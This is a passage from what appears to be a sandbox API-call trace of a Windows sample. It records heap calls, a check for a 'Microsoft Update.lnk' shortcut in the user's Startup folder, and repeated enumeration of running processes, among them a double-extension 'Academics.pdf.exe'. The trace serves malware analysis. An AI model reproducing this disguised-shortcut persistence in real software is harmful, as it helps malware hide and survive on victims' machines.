Flags=0x0, Size=0x10) returned 0x34aa850 [0301.532] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa910 [0301.532] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18a8 [0301.532] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa310 [0301.532] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18a8 | out: hHeap=0x25c0000) returned 1 [0301.532] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xca) returned 0x24207f0 [0301.532] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b18a8 [0301.532] CharUpperBuffW (in: lpsz="StartupDir", cchLength=0xa | out: lpsz="STARTUPDIR") returned 0xa [0301.532] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaaa8 [0301.532] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa598 [0301.533] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x34aaa18 [0301.533] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa508 [0301.533] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaaa8 | out: hHeap=0x25c0000) returned 1 [0301.533] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x34aaaa8 [0301.533] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1898 [0301.533] SHGetFolderPathW (in: hwnd=0x0, csidl=7, hToken=0x0, dwFlags=0x0, pszPath=0x8bf2a0 | out: pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup") returned 0x0 [0301.533] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa4d8 [0301.533] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc0) returned 0x249c7b0 [0301.533] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1768 [0301.533] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1898 | out: hHeap=0x25c0000) returned 1 [0301.533] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24207f0 | out: hHeap=0x25c0000) returned 1 [0301.533] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18a8 | out: hHeap=0x25c0000) returned 1 [0301.533] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa508 | out: hHeap=0x25c0000) returned 1 [0301.534] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaa18 | out: hHeap=0x25c0000) returned 1 [0301.534] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaaa8 | out: hHeap=0x25c0000) returned 1 [0301.534] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa598 | out: hHeap=0x25c0000) returned 1 [0301.534] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa310 | out: hHeap=0x25c0000) returned 1 [0301.534] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa910 | out: hHeap=0x25c0000) returned 1 [0301.534] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa850 | out: hHeap=0x25c0000) returned 1 [0301.534] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18a8 [0301.534] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466e10 [0301.534] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa850 [0301.534] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x1d0) returned 0x24b2e00 [0301.534] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x249c7b0 | out: hHeap=0x25c0000) returned 1 [0301.534] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa850 | out: hHeap=0x25c0000) returned 1 [0301.534] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466e10 | out: hHeap=0x25c0000) returned 1 [0301.534] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18a8 | out: hHeap=0x25c0000) returned 1 [0301.535] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1708 | out: hHeap=0x25c0000) returned 1 [0301.535] GetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup/Microsoft Update.lnk" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\start menu\\programs\\startup\\microsoft update.lnk")) returned 0x20 [0301.535] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2e00 | out: hHeap=0x25c0000) returned 1 [0301.535] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1768 | out: hHeap=0x25c0000) returned 1 [0301.535] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4d8 | out: hHeap=0x25c0000) returned 1 [0301.535] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa778 | out: hHeap=0x25c0000) returned 1 [0301.535] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa700 | out: hHeap=0x25c0000) returned 1 [0301.535] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1748 | out: hHeap=0x25c0000) returned 1 [0301.535] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2058 | out: hHeap=0x25c0000) returned 1 [0301.535] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d6e0 [0301.535] PeekMessageW (in: lpMsg=0x8bf970, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf970) returned 0 [0301.535] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d6e0 | out: hHeap=0x25c0000) returned 1 [0301.536] PeekMessageW (in: lpMsg=0x8bf970, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf970) returned 0 [0301.536] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2058 [0301.536] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa700 [0301.536] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa778 [0301.536] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1748 [0301.536] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa4d8 [0301.536] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1748 | out: hHeap=0x25c0000) returned 1 [0301.536] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x294 [0301.538] Process32FirstW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0301.539] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x51, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0301.540] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x104, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0301.541] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x148, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0301.542] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x17c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0301.543] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x188, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x174, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0301.543] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1b0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x174, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0301.544] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x17c, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0301.545] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x17c, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0301.546] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x17c, pcPriClassBase=8, dwFlags=0x0, szExeFile="lsm.exe")) returned 1 [0301.547] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x254, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0301.548] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x298, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0301.549] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0301.549] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x334, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0301.550] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x36c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1f, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0301.551] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3a8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x2cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0301.552] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3f8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0301.553] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x124, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0301.554] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x448, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x334, pcPriClassBase=8, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0301.555] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x45c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1b, th32ParentProcessID=0x440, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0301.556] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x480, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0301.557] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0301.558] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0301.559] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x50c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x36c, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1 [0301.560] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="advised-cleaners-junction.exe")) returned 1 [0301.560] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7b4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="thy-transaction-css.exe")) returned 1 [0301.561] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x56c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="says_settlement.exe")) returned 1 [0301.562] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x774, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="katie.exe")) returned 1 [0301.563] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x688, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="choosing.exe")) returned 1 [0301.564] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="pmc.exe")) returned 1 [0301.565] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="sansruled.exe")) returned 1 [0301.566] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x508, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="platform.exe")) returned 1 [0301.567] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x40c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="student.exe")) returned 1 [0301.567] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xc4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="deployment.exe")) returned 1 [0301.578] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x114, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="close.exe")) returned 1 [0301.579] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x684, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="reviewerbedrooms.exe")) returned 1 [0301.580] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x5d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="lb_indigenous_neighborhood.exe")) returned 1 [0301.581] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x288, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="ghana-after.exe")) returned 1 [0301.582] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x5a8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="perfect tries.exe")) returned 1 [0301.583] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x6f4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="flexible.exe")) returned 1 [0301.583] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x738, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="secrets cas finding.exe")) returned 1 [0301.584] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x618, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="width cleared.exe")) returned 1 [0301.585] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x820, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x254, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0301.586] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x898, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0301.587] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x8f0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="sppsvc.exe")) returned 1 [0301.587] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x90c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0301.588] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xb0c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="Academics.pdf.exe")) returned 1 [0301.589] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xbec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x254, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0301.590] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xbec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x254, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 0 [0301.591] CloseHandle (hObject=0x294) returned 1 [0301.591] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4d8 | out: hHeap=0x25c0000) returned 1 [0301.591] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa778 | out: hHeap=0x25c0000) returned 1 [0301.591] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa700 | out: hHeap=0x25c0000) returned 1 [0301.591] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2058 | out: hHeap=0x25c0000) returned 1 [0301.591] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d6e0 [0301.591] PeekMessageW (in: lpMsg=0x8bf970, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf970) returned 0 [0301.591] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d6e0 | out: hHeap=0x25c0000) returned 1 [0301.591] PeekMessageW (in: lpMsg=0x8bf970, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf970) returned 0 [0301.591] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2058 [0301.591] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa700 [0301.591] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa778 [0301.591] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1748 [0301.591] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa4d8 [0301.591] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1748 | out: hHeap=0x25c0000) returned 1 [0301.591] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x294 [0301.593] Process32FirstW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0301.594] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x51, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0301.595] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x104, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0301.596] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x148, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0301.597] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x17c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0301.598] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x188, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x174, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0301.598] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1b0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x174, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0301.599] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x17c, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0301.600] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | 